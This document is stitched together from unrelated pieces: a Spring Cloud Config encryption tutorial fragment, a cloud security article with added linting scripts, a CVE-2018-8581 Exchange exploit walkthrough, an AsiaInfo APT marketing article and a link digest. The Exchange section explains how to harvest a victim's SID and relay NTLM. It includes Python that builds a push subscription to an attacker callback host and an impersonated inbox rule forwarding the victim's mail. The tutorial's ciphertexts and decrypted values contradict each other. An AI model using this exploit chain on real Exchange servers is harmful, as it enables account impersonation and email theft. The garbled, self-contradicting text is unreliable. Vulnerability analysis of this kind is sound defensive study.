AQAPWOUOh4WVexGgVv+bgtKc5E0d5Aba8VUKnzEXh27HyKSAbW+wyzDwZTbk5QYfXpoCAs413rdeNIdR2ez44nkjT5V+438/VQExySzjZphp0xYXi9YIaJqA3+Ji+IWK8hrGtJ4dzxIkmItiimCOirLdZzZGDm/yklMUVh7lARSNuMxXGKlpdBPKYWdqHm57ob6Sb0ivm4H4mL1n4d3QUCuE7hh2F4Aw4oln7XueyMkRPTtPy8OpnBEEZhRfmaL/auVZquLU5jjMNJk9JiWOy+DSTscViY/MZ+dypv6F4AfDdVvog89sNmPzcUT+zmB8jXHdjLoKy+63RG326WffY9OPuImW6/kCWZHV6Vws55hHqRy713W6yDBlrQ/gYC3Wils=

Then we test decryption:

curl http://localhost:8888/decrypt -d AQAPWOUOh4+bgtKc5E0d5Aba8VUKnzEXh27HyKSAbW+wyzDwZTbk5QYfXpoCAs413rdeNIdR2ez44nkjT5V+438/VQExySzjZPhP0xYXi9YIaJqA3+Ji+IWK8hrGtJ4dzxIkmItiimCOirLdZzZGDm/yklMUVh7lARSNuMxXGKlpdBPKYWdqHm57ob6Sb0ivm4H4mL1n4d3QUCuE7hh2F4Aw4oln7XueyMkRPTtPy8OpnBEEZhRfmaL/auVZquLU5jjMNJk9JiWOy+DSTscViY/MZ+dypv6F4AfDdVvog89sNmPzcUT+zmB8jXHdjLoKy+63RG326WffY9OPuImW6/kCWZHV6Vws55hHqRy713W6yDBlrQ/gYC3Wils=

which returns

lind123

Note that /encrypt and /decrypt hand plaintext to anyone who can reach them: outside a local test the config server must require authentication (Spring Cloud Config documents securing these endpoints with Spring Security) and should be reachable only by trusted clients.

Applying it to a project

Add the dependency

implementation('org.springframework.security:spring-security-rsa')

bootstrap.yml contents

user:
  password: '{cipher}AQAPWOUOh4WVexGgVv+bgtKc5E0d5Aba8VUKnzEXh27HyKSAbW+wyzDwZTbk5QYfXpoCAs413rdeNIdR2ez44nkjT5V+438/VQExySzjZPhP0xYXi9YIaJqA3+Ji+IWK8hrGtJ4dzxIkmItiimCOirLdZzZGDm/yklMUVh7lARSNuMxXGKlpdBPKYWdqHm57ob6Sb0ivm4H4mL1n4d3QUCuE7hh2F4Aw4oln7XueyMkRPTtPy8OpnBEEZhRfmaL/auVZquLU5jjMNJk9JiWOy+DSTscViY/MZ+dypv6F4AfDdVvog89sNmPzcUT+zmB8jXHdjLoKy+63RG326WffY9OPuImW6/kCWZHV6Vws55hHqRy713W6yDBlrQ/gYC3Wils='

Access: http://localhost:8888/service1/svt

The returned value is already decrypted:

{ "user.password": "23456789" }
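A check a practitioner would run before committing a client's bootstrap.yml, added here as an example and not part of the original post: it flattens the simple indented key/value YAML used above into dotted keys, flags secret-looking keys (password, secret, token, private-key) whose value lacks the {cipher} prefix, and confirms that every {cipher} value is valid Base64, as the config server's /encrypt output is. It understands only the mapping form shown in this article, not YAML lists or anchors; the sample file and its placeholder ciphertext are constructed.

```python
"""Check a Spring Cloud Config client's bootstrap.yml for unencrypted secrets.

Added example, not from the original post. Handles only the indented
'key: value' mapping form used in the article; the sample file and its
placeholder ciphertext are constructed.
"""
import base64
import binascii
import re

CIPHER_PREFIX = "{cipher}"
# Keys whose values must never be committed in the clear.
SECRET_KEY_PATTERN = re.compile(r"(password|passwd|secret|token|private[-_]?key)$", re.I)


def flatten_yaml(text):
    """Flatten simple indented YAML mappings into {'a.b.c': 'value'}."""
    result = {}
    stack = []  # (indent, key) pairs describing the current nesting path
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()  # drop comments
        if not line.strip():
            continue
        indent = len(line) - len(line.lstrip())
        key, _, value = line.strip().partition(":")
        while stack and stack[-1][0] >= indent:
            stack.pop()
        stack.append((indent, key.strip()))
        value = value.strip().strip("'\"")
        if value:
            result[".".join(k for _, k in stack)] = value
    return result


def check_secrets(flat):
    """Return (key, problem) for plaintext secrets and malformed {cipher} values."""
    findings = []
    for key, value in flat.items():
        if value.startswith(CIPHER_PREFIX):
            payload = value[len(CIPHER_PREFIX):]
            try:
                base64.b64decode(payload, validate=True)
            except (binascii.Error, ValueError):
                findings.append((key, "malformed {cipher} value (not Base64)"))
        elif SECRET_KEY_PATTERN.search(key):
            findings.append((key, "plaintext secret; encrypt it via POST /encrypt"))
    return findings


# Constructed sample; the Base64 is a placeholder, not real /encrypt output.
SAMPLE_BOOTSTRAP = """\
spring:
  application:
    name: service1
  cloud:
    config:
      uri: http://localhost:8888
user:
  password: '{cipher}QUJDREVGR0hJSktMTU5PUA=='
db:
  password: hunter2
api:
  token: '{cipher}not base64!!'
"""

if __name__ == "__main__":
    for key, problem in check_secrets(flatten_yaml(SAMPLE_BOOTSTRAP)):
        print(f"{key}: {problem}")
```

Run it as a pre-commit hook over every bootstrap.yml and application.yml in the repository; a Base64 check cannot tell a genuine ciphertext from a pasted placeholder, so the real confirmation is still a successful fetch from the config server.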

How to be Secure in the Cloud


This article was first published on Medium. You can take a look at it here .

Introduction

Cloud computing has been a popular buzzword in recent years, leading some to be skeptical of its benefits. There are considerable benefits to cloud computing but most are focused on cost effectiveness and speed. Rarely do people mention how security is a benefit of moving to the cloud. The reality is that the cloud can be as secure or insecure as you make it. However, if architected properly, it is possible to have a highly resilient, scalable, secure and compliant application in the cloud.

The first benefit of moving to the cloud is that responsibility for securing the environment is shared between the customer and the cloud vendor. In an on-premise environment, the customer handles all of the security (Figure 1). In an infrastructure-as-a-service cloud environment, the customer is responsible only for security at the operating system and above (the light blue shaded sections in Figure 2); with managed platform and serverless services the provider takes over still more of the stack, although the customer always remains responsible for its own data, identities and configuration. Moving to the cloud lets customers focus their energy on building a robust and secure application.

Figure 1: on-premise security responsibilities (image not reproduced)

Figure 2: cloud shared-responsibility model (image not reproduced)

Scalability & Resiliency

Hosting an application in the cloud lets you take advantage of on-demand scalability. A lack of scalability is a customer experience problem as well as a security threat. As an application grows in popularity it becomes harder to predict when customers will access the site. One server cannot handle millions of requests, but having hundreds of servers lie idle during low-demand parts of the day is not ideal either. Instead of buying more hardware and software as the application grows, you can provision resources on demand and pay only for what you use.

Imagine an e-commerce site where one item is suddenly very much in demand. While the internet loves your product, the operations team sees a huge spike in network traffic and suddenly the server is at capacity. Orders are not processed, downloads are incredibly slow and customers are unhappy. In a cloud environment, autoscaling and elastic load balancing keep this from happening: when the load balancer sees too much load, it triggers an autoscaling policy that spins up new servers, and when demand falls the servers are scaled back down so you are not paying for unused capacity. Orders complete and download times are unaffected, leaving happy customers.

Scaling is not only cost-effective, it also makes the application resilient. If you have a single physical server and it suffers a hardware failure, replacing it and restoring the application takes time. In the cloud, a failing server can be terminated and a new one created in under five minutes, and the process can be automated.

Similarly, an on-premise application with fixed capacity has little hope of withstanding a DDoS attack. In a cloud environment we can scale up and absorb the load. A DDoS attack aims to push infrastructure to its breaking point and assumes that you cannot scale to meet it; its success depends on that assumption. The simplest counter is therefore to design the infrastructure to scale horizontally and vertically when needed (bearing in mind that absorbed traffic is billed, so scaling should be paired with the provider's DDoS protection and rate limiting). Scaling gives four benefits when mitigating a DDoS attack:

1. The attack is spread over a larger area.
2. The attackers have to scale their attack up to match, consuming more of their own resources.
3. Scaling buys time to analyze the attack and respond with appropriate countermeasures.
4. Scaling provides additional redundancy.

Scaling on-demand in the cloud provides resiliency and a means to protect an application from increased network traffic, hardware failures and DDoS attacks in a cost-effective manner. Next, we will discuss how a cloud environment can enable better identity and access management processes.

Identity and Access Management

The purpose of IAM is to provision, manage and de-provision the identities that have access to your cloud environment's infrastructure. With IAM you centrally manage users, security credentials, access keys and the permission policies that control which services and resources each identity can reach. Without a permission strategy anyone would be able to run privileged commands, and someone could wreak havoc on the system, intentionally or not. Setting up Identity and Access Management (IAM) in a cloud environment helps ensure this does not happen.

The goal is to never have to log in as the root user. Four components of IAM enable secure, least-privilege access to the infrastructure and application:

Central User Repository: stores and delivers identity information to other services.
Authentication: establishes an identity by asking who you are and verifying the claim with one or more authentication factors.
Authorization: after authentication, evaluates whether you have permission to access what you are trying to reach.
User Management: manages the user lifecycle (onboarding, offboarding, role changes, identity and password changes).

Authentication is simplified in the cloud by federated identity management (FIM): the application no longer has to handle identification and authentication itself, only authorization. Federation standards such as SAML, OpenID Connect (built on OAuth 2.0) and WS-Federation provide single sign-on (SSO) and let users, developers and admins be granted only the access they need, enforcing the principle of least privilege.

IAM helps us regulate who has access to the data, but we also need to be mindful of how we are protecting data in the cloud.
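Least privilege is easy to state and easy to violate in a policy document. The following added example (not from the original article) lints IAM-style JSON policies in the common Statement/Effect/Action/Resource grammar and reports Allow statements that grant every action, a whole service through a service:* wildcard, or every resource without a Condition. The two sample policies are constructed, and the checks are a starting point rather than a complete permission audit.

```python
"""Least-privilege linter for IAM-style JSON policy documents (added example)."""
import json


def _as_list(value):
    """IAM allows a string or a list for Statement/Action/Resource; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def lint_statement(index, stmt):
    """Return findings for one statement; only Allow statements can over-grant."""
    findings = []
    if stmt.get("Effect") != "Allow":
        return findings
    actions = _as_list(stmt.get("Action"))
    resources = _as_list(stmt.get("Resource"))
    if "*" in actions:
        findings.append((index, "Action '*' grants every API call"))
    else:
        for action in actions:
            if action.endswith(":*"):
                findings.append((index, f"Action '{action}' grants a whole service"))
    if "*" in resources and not stmt.get("Condition"):
        findings.append((index, "Resource '*' with no Condition applies to every resource"))
    if "NotAction" in stmt or "NotResource" in stmt:
        findings.append((index, "NotAction/NotResource in an Allow widens as new APIs appear"))
    return findings


def lint_policy(policy_json):
    """Lint a policy document; return a list of (statement index, finding)."""
    policy = json.loads(policy_json)
    findings = []
    for index, stmt in enumerate(_as_list(policy.get("Statement"))):
        findings.extend(lint_statement(index, stmt))
    return findings


# Constructed sample policies.
ADMIN_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}],
})

SCOPED_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow",
         "Action": ["s3:GetObject", "s3:PutObject"],
         "Resource": "arn:aws:s3:::app-uploads/*"},
        {"Effect": "Allow",
         "Action": "s3:*",  # whole service on one bucket: flagged
         "Resource": "arn:aws:s3:::app-uploads"},
        {"Effect": "Deny", "Action": "*", "Resource": "*"},  # a Deny never over-grants
    ],
})

if __name__ == "__main__":
    for name, doc in (("admin", ADMIN_POLICY), ("scoped", SCOPED_POLICY)):
        print(name, lint_policy(doc) or "no findings")
```

Wire it into the pipeline that deploys infrastructure-as-code so that an over-broad policy fails the build rather than being discovered in an audit; the provider's own policy simulator or access analyzer can then answer the harder question of what the remaining grants actually reach.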

Data Protection

Using the same example of an e-commerce application, in the event of a hardware failure that causes data loss, you would lose more than just application code. Chances are, your application could contain sensitive customer information such as personally identifiable information (PII) and credit card information, which would also be lost.

Creating backups via snapshots is easy in the cloud. We can snapshot databases and storage volumes and restore from those snapshots if necessary. Many providers also offer storage tiers, including archival storage, with very high durability that can form part of the backup strategy. A snapshot is a complete copy of the data, so it needs the same encryption and access restrictions as the source, and restores should be tested regularly.

We also want to secure any sensitive information the application stores or processes, so we encrypt data in transit and at rest. At rest, encrypt the whole disk or volume where the data lives (and the backups and snapshots taken from it); in transit, use TLS or VPNs.

We also want to protect the application from common web exploits, such as SQL injection and cross-site scripting, that could compromise security or affect availability, to filter out known bad IP addresses, and to monitor HTTP and HTTPS requests. A web application firewall (WAF) does this. Network-level firewalls (security groups) are typically built into the cloud environment with default-deny inbound rules, giving the application and data an extra layer of protection.

Protecting our data is not enough, we need to also ensure that we are compliant with any laws and regulations.

Compliance

Assuming our sample application processes credit card information, we need to be PCI DSS compliant. Major providers such as AWS are PCI DSS certified for the infrastructure they operate, but under the shared responsibility model we remain responsible for the way our own application stores, processes and transmits cardholder data. We should also comply with any data retention policies that apply; lifecycle rules in storage services can enforce them.

If the application ever goes through an audit, you won't have to spend hours preparing, because asset inventory and auditing tools are built-in cloud services. Since every action in a cloud environment is an API call, API activity can be logged extensively. Logs capture console and API logins, unusually high rates of API activity, new kinds of API activity and new IP addresses accessing the database, and they are just as useful in the event of a data breach or cyber-attack.

Setting up secure infrastructure, protecting our data and ensuring compliance will only be useful if the actual application code is secure. With the shift to the cloud, developers can start to embrace DevSecOps and its principles related to secure coding practices.

Secure Coding Practices

Following DevSecOps principles can lead to a robust patching strategy as well as secure code. One DevSecOps principle states “Automate security updates.” This is an important principle as it pertains to using automated tools for patching the OS, core services and the application itself. Developers can use tools such as Puppet and Chef to enable continuous patching in the cloud environment.

Another DevSecOps principle states, “Integrate and automate security scanning from the start.” To establish secure coding practices, we can combine automated code analysis with manual code review, reviewing the code every time there is a meaningful change in the code base. Additionally, we should run static and dynamic analysis (SAST and DAST) and penetration tests against the application to find vulnerabilities and fix them before the code reaches production.

Conclusion

As you can see, many characteristics of the cloud lend themselves nicely to security. We can use autoscaling to provide scalability and resiliency, IAM to regulate user and resource access, cloud services for data protection and compliance, and DevSecOps for secure coding practices. Thus it is possible to have secure applications in a cloud environment.

This is my twelfth post in my "What is" tech blog series. I'll be writing more every week here and on my blog !

Analysis of CVE-2018-8581: impersonating users on Microsoft Exchange

Introduction

This is the third case in our series on the Top 5 interesting bugs of 2018. Each of these vulnerabilities has something that makes it stand out from the roughly 1,400 reports published this year. Today we analyze an Exchange vulnerability that lets any authenticated user impersonate other users on the Exchange Server.

In his December article, ZDI's Dustin Childs mentioned an Exchange vulnerability that lets any user on an Exchange server impersonate anyone else on that server. While the bug could be used for some internal hijacking, it is more likely to be used for phishing, data theft or other malware operations. As part of the Top 5 series, this post digs into the details of this SSRF (server-side request forgery) bug and shows how the impersonation is achieved.

The Vulnerability

The vulnerability is the result of combining an SSRF bug with a second flaw. Exchange allows any user to specify a URL of their choosing for a push subscription, and the server will then try to send notifications to that URL. The problem is that the Exchange server makes this connection using CredentialCache.DefaultCredentials.

In Exchange Web Services, the process using CredentialCache.DefaultCredentials runs as NT AUTHORITY\SYSTEM, so the default credentials are the Exchange server's own machine account. The server therefore performs NTLM authentication against the attacker's server, handing the attacker NTLM credentials that can be relayed. The Exchange server also sets the following registry value by default:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\DisableLoopbackCheck = 1

This lets the attacker relay the captured NTLM authentication over HTTP back to the Exchange server itself: with the loopback check disabled, the server accepts its own machine account's credentials. For example, the relayed credentials can be used to access Exchange Web Services (EWS). Because the session runs at the NT AUTHORITY\SYSTEM level, the attacker obtains a "privileged" session holding TokenSerializationRight, and can then use a SOAP request header to impersonate any user.

The original post shows an example of such a SOAP request header, which impersonates the administrator using the SID S-1-5-21-4187549019-2363330540-1546371449-500.

Exploit

For the demonstration we will use a couple of Python scripts:

serverHTTP_relayNTLM.py: accepts the inbound connection, captures the NTLM authentication and uses it to authenticate to EWS

exch_EWS_pushSubscribe.py: issues the PushSubscription EWS call that points the Exchange server at serverHTTP_relayNTLM.py

You can download the scripts here. You will also need the python-ntlm module.

The first step of the exploit is to obtain the SID of the user we want to impersonate. One possible way to do this is as follows:

Log in to OWA as an authorized user. Here we log in as "attacker":
Next, create any new folder. In this example we used temfold. Select the "Permissions…" option in the context menu:
Here, add the email address of the person to impersonate. Our target is the victim, victim@contoso.local:
Now press F12 and select the Network tab. Then select the "Permissions…" option in the context menu of the new folder again.
We need to examine the response to the first service.svc?action=GetFolder request. Look at the path:
Body->ResponseMessages->Items->0->Folders->0->PermissionSet->Permissions->N->UserId->SID
In this example N is 2 (the most recent entry), but you can check all of them to find the right one; the PrimarySmtpAddress should be the intended victim. If the response does not contain a PermissionSet item, check another service.svc?action=GetFolder request.
We will use this SID in serverHTTP_relayNTLM.py to impersonate the victim. We also need to choose a TCP port on the attacker-controlled machine that is unlikely to be blocked, so that the Exchange Server can make an outbound connection to it. For example, TCP port 8080 may be available.
Now let's change the following lines in serverHTTP_relayNTLM.py to the real values:
Once the script has the correct variables, it can be started:
The next step is to set the appropriate variables in the exch_EWS_pushSubscribe.py script:
Once that is done, we can run the script:
The last step: we need some event to trigger a push notification. We can either wait a while or perform an action ourselves, such as creating and sending a new email or deleting our new folder:
If this succeeds, we should receive an inbound connection from the Exchange server to serverHTTP_relayNTLM.py:

If the attack succeeds, we will see UpdateInboxRulesResponse ResponseClass="Success" in the last response. This means an inbox rule has been added to the victim's mailbox and all inbound email will be forwarded to the attacker.

Now everything is in place and it is time to test. We need to send an email to the victim from any account other than the destination of our new rule (attacker@contoso.local in this example), because the rule will not forward a message whose source and destination are the same address. Let's log in as the administrator and send the victim some "sensitive" information:

Checking the attacker's inbox, we see the message was forwarded successfully:

As we can see, the new email was forwarded to the attacker. Similar results can be achieved through other EWS APIs, such as AddDelegate or assigning edit permissions on a target folder.
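As an added example that is not part of the original post or of the ZDI scripts it references, the Python below builds the two EWS messages described above and parses the reply: the Subscribe request whose PushSubscriptionRequest URL is the SSRF primitive, and the UpdateInboxRules request that carries the ExchangeImpersonation header with the victim's SID and adds a forwarding rule. The NTLM relay itself (the job of serverHTTP_relayNTLM.py) is deliberately not reproduced. Element names and ordering follow the EWS schema as generally documented, not anything shown on this page; the host attacker.contoso.local, the port 8080 and the rule name are assumptions, the sample response is constructed, and the administrator SID is the one quoted above.

```python
"""Added example: EWS SOAP messages in the CVE-2018-8581 chain, built and
parsed offline with the standard library. Not the ZDI scripts.

Element names follow the EWS schema as generally documented; the page only
describes the messages. Host name, port and rule name are assumptions; the
SID is the one quoted in the post; the sample response is constructed.
"""
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
TYPES_NS = "http://schemas.microsoft.com/exchange/services/2006/types"
MSG_NS = "http://schemas.microsoft.com/exchange/services/2006/messages"
NS = {"soap": SOAP_NS, "t": TYPES_NS, "m": MSG_NS}
for _prefix, _uri in NS.items():
    ET.register_namespace(_prefix, _uri)

# Administrator SID as quoted in the post.
ADMIN_SID = "S-1-5-21-4187549019-2363330540-1546371449-500"
# Assumed attacker listener; the post only says TCP 8080 "may be available".
CALLBACK_URL = "http://attacker.contoso.local:8080/"


def _t(name):
    return f"{{{TYPES_NS}}}{name}"


def _m(name):
    return f"{{{MSG_NS}}}{name}"


def _envelope(body, impersonate_sid=None):
    """Wrap an EWS body in a SOAP 1.1 envelope. With a SID, add the
    ExchangeImpersonation header that a SYSTEM-level session holding
    TokenSerializationRight can use to act as that user."""
    env = ET.Element(f"{{{SOAP_NS}}}Envelope")
    header = ET.SubElement(env, f"{{{SOAP_NS}}}Header")
    ET.SubElement(header, _t("RequestServerVersion"), Version="Exchange2013")
    if impersonate_sid is not None:
        imp = ET.SubElement(header, _t("ExchangeImpersonation"))
        connecting = ET.SubElement(imp, _t("ConnectingSID"))
        ET.SubElement(connecting, _t("SID")).text = impersonate_sid
    ET.SubElement(env, f"{{{SOAP_NS}}}Body").append(body)
    return ET.tostring(env, encoding="unicode")


def build_push_subscription(callback_url=CALLBACK_URL, status_frequency=1):
    """Step 1, the SSRF: any authenticated user may ask Exchange to push
    notifications to an arbitrary URL, and Exchange connects to it with
    DefaultCredentials, i.e. as its own machine account."""
    sub = ET.Element(_m("Subscribe"))
    req = ET.SubElement(sub, _m("PushSubscriptionRequest"), SubscribeToAllFolders="true")
    events = ET.SubElement(req, _t("EventTypes"))
    ET.SubElement(events, _t("EventType")).text = "NewMailEvent"
    ET.SubElement(req, _t("StatusFrequency")).text = str(status_frequency)
    ET.SubElement(req, _t("URL")).text = callback_url
    return _envelope(sub)


def build_forward_rule(victim_sid, forward_to, rule_name="fwd"):
    """Step 2, sent by the relayed session: impersonate the victim by SID and
    create an inbox rule that forwards every new message to the attacker."""
    upd = ET.Element(_m("UpdateInboxRules"))
    ET.SubElement(upd, _m("RemoveOutlookRuleBlob")).text = "true"
    ops = ET.SubElement(upd, _m("Operations"))
    rule = ET.SubElement(ET.SubElement(ops, _t("CreateRuleOperation")), _t("Rule"))
    ET.SubElement(rule, _t("DisplayName")).text = rule_name
    ET.SubElement(rule, _t("Priority")).text = "1"
    ET.SubElement(rule, _t("IsEnabled")).text = "true"
    ET.SubElement(rule, _t("Conditions"))  # empty conditions: matches every message
    actions = ET.SubElement(rule, _t("Actions"))
    recipients = ET.SubElement(actions, _t("ForwardToRecipients"))
    address = ET.SubElement(recipients, _t("Address"))
    ET.SubElement(address, _t("EmailAddress")).text = forward_to
    return _envelope(upd, impersonate_sid=victim_sid)


def impersonated_sid(soap_request):
    """Return the SID named in an ExchangeImpersonation header, or None.
    Defensively, an impersonation header on a request authenticated as the
    Exchange machine account itself is the signature of this relay."""
    root = ET.fromstring(soap_request)
    sid = root.find("soap:Header/t:ExchangeImpersonation/t:ConnectingSID/t:SID", NS)
    return None if sid is None else sid.text


def response_class(soap_response):
    """Extract ResponseClass from an UpdateInboxRulesResponse; the post treats
    "Success" as confirmation that the forwarding rule was created."""
    root = ET.fromstring(soap_response)
    resp = root.find(".//m:UpdateInboxRulesResponse", NS)
    return None if resp is None else resp.get("ResponseClass")


# Constructed sample of a successful reply, shaped like the real one.
SAMPLE_SUCCESS_RESPONSE = (
    '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body>'
    '<m:UpdateInboxRulesResponse ResponseClass="Success" '
    'xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages">'
    '<m:ResponseCode>NoError</m:ResponseCode>'
    '</m:UpdateInboxRulesResponse></s:Body></s:Envelope>'
)

if __name__ == "__main__":
    print(build_push_subscription())
    print(build_forward_rule(ADMIN_SID, "attacker@contoso.local"))
    print(response_class(SAMPLE_SUCCESS_RESPONSE))
```

Nothing here touches the network: the point is to see both messages side by side and to notice that the only thing separating the two requests is the ExchangeImpersonation header, which EWS honours because the relayed session is the server's own SYSTEM-level identity.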

The Patch

Microsoft assigned this vulnerability CVE-2018-8581 and published mitigations with its November release. As of this writing there is no actual patch; instead, Microsoft says the registry value should be removed, which re-enables the loopback check. Recall from above that the Exchange server sets the following registry value by default:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\DisableLoopbackCheck = 1

If the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\DisableLoopbackCheck value is removed, the vulnerability can no longer be exploited. To remove it, delete the value with reg delete from an elevated CMD window, as given in Microsoft's advisory.

No reboot or Exchange Server restart is needed after removing the value. The advisory notes that future Exchange updates will no longer enable this registry value by default.

Conclusion

Email has become a core component of our business lives, and Exchange Server has been a popular target for years. This vulnerability allows user impersonation, and a previously reported vulnerability allowed arbitrary code execution. Both cases show that sometimes the greatest security risk comes from within. They also show how an external attacker could spread across an entire enterprise from a single point of entry.

In the APT Attack and Defense Game, What Advanced Threat Governance Strategy Has AsiaInfo Security Adopted?


[51CTO.com original article] At the recently held AsiaInfo Security Advanced Threat Governance 10th Anniversary and XDR Strategy Launch, Tong Ning, General Manager of General Security Products at AsiaInfo Security, recalled the time before the APT concept was widely recognized: "Ten years ago we started to be wary of APTs and told users to be wary too, but nobody could understand it and nobody realized APTs existed. As data breach incidents increased, people classified them as data security or regulatory compliance problems, when in essence they were APTs."

Through continuous evolution, APTs have become the most aggressive, stealthy and destructive network threat. Today, under the shadow of APT attacks, almost no country or industry has been spared.



Tong Ning, General Manager of General Security Products, AsiaInfo Security

Looking back on ten years of threat governance, Tong Ning said: "Over these ten years we went through a process of exploration, innovation, integration and spiral iteration, and the contest with criminals has made AsiaInfo Security a leader in advanced threat governance. This is a long duel, about the future, and the future of the future."

Ten Years of an Evolving Advanced Threat Governance Strategy

Bai Ri, Product Director at AsiaInfo Security, said that the evolution of security threats spans roughly 20 years, from the large-scale virus outbreaks of the late 1990s, to their fading away around 2005, to the continuous emergence of typical APT attack incidents from 2007 onward. Threat evolution can be divided into three stages:

The first stage, the period of large-scale virus outbreaks, when many hackers and attackers created and spread malicious viruses to make a name for themselves;

The second stage, when threat and attack techniques were mainly used between nation states, with political intent;

The third stage, when threats carry a large criminal economy, whose operators obtain cash through targeted ransomware attacks and similar means.

Clearly, the essence and nature of each stage of threat evolution differ, so the governance methods and measures for the relevant threats also differ at each stage.

Accordingly, AsiaInfo Security's advanced threat governance strategy has evolved continuously over the past ten years. In 2008, Trend Micro (in 2015 AsiaInfo Technologies acquired Trend Micro China and established AsiaInfo Security) formally released its APT advanced threat governance strategy, the prototype of strategy 1.0.

In 2015, AsiaInfo Security released APT governance strategy 2.0, "spiral iteration". This governance model is centered on monitoring, with detection, analysis, response and prevention as its four governance processes. It also proposed two supporting systems: a dual loop of local and cloud threat intelligence, and a comprehensive coordinated threat governance system. On the product dimension it achieved coordination across the entire "cloud, network, endpoint" product line; on the management dimension it achieved end-to-end coordination from detection and analysis through response and blocking.



(Image content from AsiaInfo Security)

APT Advanced Threat Governance for the Next Decade

The above describes AsiaInfo Security's advanced threat governance strategy over the past decade. What governance strategy does AsiaInfo Security have for the next one?

"Now, from the perspective of security operations, AsiaInfo Security has proposed building a coordinated security operations system through the precise orchestration capabilities of a SOAR platform. This is also the prototype of next-generation threat governance strategy 3.0," Bai Ri said.

Looking at how APT threat governance capabilities have developed over the past decade, the continuous evolution, combination and coordination of technologies and products means users can generally achieve discovery and analysis, but response and prediction are becoming progressively harder. For example, when users receive massive volumes of alerts, their limited technical capacity means they cannot respond quickly, they lack the ability to recover and remediate quickly, and they are even less able to confirm attack intent or trace its origin.

With this in mind, AsiaInfo Security began to build precisely orchestrated cyberspace recovery and remediation capabilities; in advanced threat governance strategy 3.0, AsiaInfo Security provides rapid response capability.

AsiaInfo Security holds that the capability from discovery to response consists of four parts: alert handling, which classifies and prioritizes security incidents; qualitative analysis, which judges whether a threat is real and confirms its nature and intent; quantitative analysis, which reconstructs the attack scenario and assesses the threat's severity, impact and scope; and rapid response, which executes response strategies according to response playbooks. These four parts make up AsiaInfo Security's SOAR framework as seen from the security operations perspective.



(Image content from AsiaInfo Security)

AsiaInfo Security's SOAR framework uses a precisely orchestrated, coordinated security solution to connect and integrate security products and security processes, and, drawing on comprehensively collected security data and alerts, combines human experts and machine learning for incident analysis.

What value does SOAR bring? Bai Ri told reporters: first, it shortens emergency response time and improves response efficiency; second, it reduces and streamlines unnecessary and redundant work in the traditional SOC; third, the integrated APIs of security products accelerate automation; fourth, it enables rich related data security services, such as a threat intelligence platform; fifth, it improves the quality of alert analysis and the ability to detect and discover threats; sixth, it improves the precision of the work; seventh, it reduces the cost of training new security operations analysts; eighth, it improves the overall capability to measure and manage security operations.

AsiaInfo Security Releases Its XDR Strategy to Address Future Advanced Threats

Building on SOAR, AsiaInfo Security formally launched the prototype of advanced threat governance strategy 3.0: the XDR strategy. Liu Zhengping, Deputy General Manager of General Product Management at AsiaInfo Security, said that "X" stands for the unknown and for all kinds of application scenarios, such as connected vehicles and smart healthcare; "D" stands for sensors, since different monitoring and data reconstruction mechanisms must be established in the cloud architecture, the network architecture and on the endpoint alike; and "R" stands for the response mechanism, which uses the SOAR framework to deliver precisely orchestrated, coordinated response.

AsiaInfo Security's XDR solution covers seven phases: preparation, discovery, analysis, containment, eradication, recovery and optimization. The preparation phase includes standard playbooks for every type of attack. Once threat data is discovered, it is collected into local and cloud threat intelligence for analysis; using machine learning and the expert team, the timing, paths, tools and every other detail of the attack are analyzed and its characteristics extracted, followed by containment, eradication, recovery and optimization.

Liu Zhengping said that although the past has not yet passed, the future has already arrived. "We need to strengthen precisely orchestrated playbooks, write the response process down very rigorously, and turn it into accumulated knowledge so that more people can learn from it. Ultimately this lets human industry experience iterate: record the playbook and keep optimizing it." A good methodology alone is not enough, however; good tools are also needed.



(Image content from AsiaInfo Security)

In the XDR strategy, AsiaInfo Security introduces new tools such as EDR, NDR and MDR, including the TDA deep threat discovery appliance, the DDAN deep threat analysis appliance, the Deep Edge deep threat security gateway, the DDEI deep threat email gateway, the Deep Security server protection system, the Control Manager console for unified coordinated management, and dedicated APT governance consulting services, thereby closing the loop from threat discovery and analysis to response.

Finally, Liu Zhengping summed up: "In an uncertain cybersecurity world, we hope to find a deterministic method that helps users genuinely improve their ability to recover and remediate in cyberspace."

[51CTO original article. Partner sites reprinting it must credit the original author and 51CTO.com as the source.]


Monthly notes


Holiday season is soon here and it’s good to take a short break from work and maybe learn or code some new things while relaxing and enjoying the winter time outside. Here’s the monthly notes for December. Happy holidays!

Issue 36, 21.12.2018

Tips

How to Exclude an App From Dark Mode in macOS Mojave

“You can enable the old dark menu bar and dock look, you can also selectively exclude individual apps from dark mode.”

Learning

Tips of ppl who want to learn

ReaktorNow Development Discussion campaign shared some insights in the field of software engineering. “Always keep learning and expanding your skills, and remember to step out of your comfort zone.”

Beyond Cryptocurrencies

Intro to crypto talk at the a16z summit. (from @ljxie )

A novice’s guide to learning to code with CS50

“CS50 is the best learning experience I have ever had in my life.” Over 12 weeks you get a two-hour lecture to watch and a problem set to complete each week. Start with Scratch, continue with C and move on to Python plus HTML, CSS, SQL, JavaScript, jQuery and JSON. (from @walokra )

Security

Taking Down an Insider Threat

Excellent story about pentesting from the inside, and about a great digital forensics and incident response team and meticulously implemented security practices.

OWASP AppSec EU 2018 presentations

Presentations from OWASP AppSec EU 2018 are available from Youtube.

Software development

Everything about distributed systems is terrible

Hillel Wayne’s 38-minute talk at Code Mesh LDN 18, titled “Everything about distributed systems is terrible”, covers TLA+, the formal specification language designed by Leslie Lamport. The claim is that model checking can find bugs in your (distributed) system that would be practically impossible to find through testing or in production.

New Initiative Takes OPC UA Out to Field Devices


